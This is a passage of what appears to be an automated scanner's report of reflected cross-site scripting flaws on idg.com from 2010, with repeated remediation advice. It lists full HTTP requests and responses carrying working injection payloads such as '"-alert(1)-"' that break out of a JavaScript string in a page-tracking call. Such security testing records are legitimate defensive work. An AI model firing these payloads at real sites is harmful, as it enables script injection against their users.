Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www98663"%3b8f87c12c52b/HomeNew.nsf/docs/licensing HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:45 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5018 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www98663";8f87c12c52b/HomeNew.nsf/docs/licensing"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13870"%3b6ce10bb9cb9 was submitted in the REST URL parameter 3. This input was echoed as 13870";6ce10bb9cb9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docs13870"%3b6ce10bb9cb9/licensing HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:46 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5018 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs13870";6ce10bb9cb9/licensing"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ceb7b"%3b0088f227736 was submitted in the REST URL parameter 4. This input was echoed as ceb7b";0088f227736 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docs/licensingceb7b"%3b0088f227736 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:46 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5018 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/licensingceb7b";0088f227736"); } catch(err) {}</script> ...[SNIP]...
2.161. http://idg.com/www/HomeNew.nsf/docs/licensing [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://idg.com
Path:
/www/HomeNew.nsf/docs/licensing
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13bc5"-alert(1)-"d146ca2428f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docs/licensing?13bc5"-alert(1)-"d146ca2428f=1 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 400 Bad Request Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:44 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5031 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/licensing?13bc5"-alert(1)-"d146ca2428f=1"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df79a"%3b4f588bb5d0f was submitted in the REST URL parameter 1. This input was echoed as df79a";4f588bb5d0f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wwwdf79a"%3b4f588bb5d0f/HomeNew.nsf/docs/media_contacts HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:56 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5023 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /wwwdf79a";4f588bb5d0f/HomeNew.nsf/docs/media_contacts"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c628"%3bee9e83583b7 was submitted in the REST URL parameter 3. This input was echoed as 4c628";ee9e83583b7 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docs4c628"%3bee9e83583b7/media_contacts HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:58 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5023 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs4c628";ee9e83583b7/media_contacts"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 822d1"%3bdea83ac2b79 was submitted in the REST URL parameter 4. This input was echoed as 822d1";dea83ac2b79 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docs/media_contacts822d1"%3bdea83ac2b79 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:59 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5023 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/media_contacts822d1";dea83ac2b79"); } catch(err) {}</script> ...[SNIP]...
2.165. http://idg.com/www/HomeNew.nsf/docs/media_contacts [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://idg.com
Path:
/www/HomeNew.nsf/docs/media_contacts
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c6f9"-alert(1)-"5d8d1380fbf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docs/media_contacts?6c6f9"-alert(1)-"5d8d1380fbf=1 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 400 Bad Request Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:56 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5036 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/media_contacts?6c6f9"-alert(1)-"5d8d1380fbf=1"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9811"%3b45302619bdf was submitted in the REST URL parameter 1. This input was echoed as d9811";45302619bdf in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wwwd9811"%3b45302619bdf/HomeNew.nsf/docs/news_service_bureaus HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:01:00 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5029 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /wwwd9811";45302619bdf/HomeNew.nsf/docs/news_service_bureaus"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98ce6"%3b23bcf83f2d1 was submitted in the REST URL parameter 3. This input was echoed as 98ce6";23bcf83f2d1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docs98ce6"%3b23bcf83f2d1/news_service_bureaus HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:01:04 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5029 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs98ce6";23bcf83f2d1/news_service_bureaus"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bffb4"%3bd6c5830b776 was submitted in the REST URL parameter 4. This input was echoed as bffb4";d6c5830b776 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docs/news_service_bureausbffb4"%3bd6c5830b776 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:01:06 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5029 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/news_service_bureausbffb4";d6c5830b776"); } catch(err) {}</script> ...[SNIP]...
2.169. http://idg.com/www/HomeNew.nsf/docs/news_service_bureaus [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://idg.com
Path:
/www/HomeNew.nsf/docs/news_service_bureaus
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d083c"-alert(1)-"cac8eda3971 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docs/news_service_bureaus?d083c"-alert(1)-"cac8eda3971=1 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 400 Bad Request Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:59 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5042 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/news_service_bureaus?d083c"-alert(1)-"cac8eda3971=1"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd6d8"%3b00f260e3c22 was submitted in the REST URL parameter 1. This input was echoed as cd6d8";00f260e3c22 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wwwcd6d8"%3b00f260e3c22/HomeNew.nsf/docs/videos HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:47 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5015 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /wwwcd6d8";00f260e3c22/HomeNew.nsf/docs/videos"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1273"%3b9d5f30a9adf was submitted in the REST URL parameter 3. This input was echoed as f1273";9d5f30a9adf in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docsf1273"%3b9d5f30a9adf/videos HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:48 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5015 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docsf1273";9d5f30a9adf/videos"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7a55"%3b0124ac27839 was submitted in the REST URL parameter 4. This input was echoed as e7a55";0124ac27839 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docs/videose7a55"%3b0124ac27839 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:48 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5015 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/videose7a55";0124ac27839"); } catch(err) {}</script> ...[SNIP]...
2.173. http://idg.com/www/HomeNew.nsf/docs/videos [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://idg.com
Path:
/www/HomeNew.nsf/docs/videos
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a66c"-alert(1)-"7641fac165d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docs/videos?6a66c"-alert(1)-"7641fac165d=1 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 400 Bad Request Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:46 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5028 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/videos?6a66c"-alert(1)-"7641fac165d=1"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d243d"%3b08b5f083b38 was submitted in the REST URL parameter 1. This input was echoed as d243d";08b5f083b38 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wwwd243d"%3b08b5f083b38/homenew.nsf HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:01:15 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5003 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /wwwd243d";08b5f083b38/homenew.nsf"); } catch(err) {}</script> ...[SNIP]...
2.175. http://idg.com/www/homenew.nsf [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://idg.com
Path:
/www/homenew.nsf
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c444a"-alert(1)-"ebcd302b3e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
